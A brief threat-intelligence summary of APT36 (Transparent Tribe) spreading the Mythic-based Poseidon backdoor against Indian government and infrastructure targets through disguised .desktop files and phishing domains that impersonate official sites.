APT36, also known as Transparent Tribe, has expanded its cyber-espionage operations targeting Indian institutions using sophisticated infection chains and a new backdoor called Poseidon. The group employs advanced phishing techniques and resilient command and control infrastructure to maintain persistent access and gather sensitive information. #APT36 #Poseidon #MythicFramework #IndianGovernment #CyberEspionage
Keypoints
- APT36 has extended its targeting to include Indian railway, oil and gas infrastructure, and the Ministry of External Affairs.
- Infection chains involve disguised .desktop files that download malicious payloads from remote servers.
- The Poseidon backdoor, built on Mythic, provides persistent access, credential harvesting, and lateral movement capabilities.
- The malware infrastructure relies on redundant C2 servers and active Mythic command and control services on DigitalOcean.
- Phishing campaigns impersonate Indian military and government domains using subdomains with misleading TLDs to steal credentials.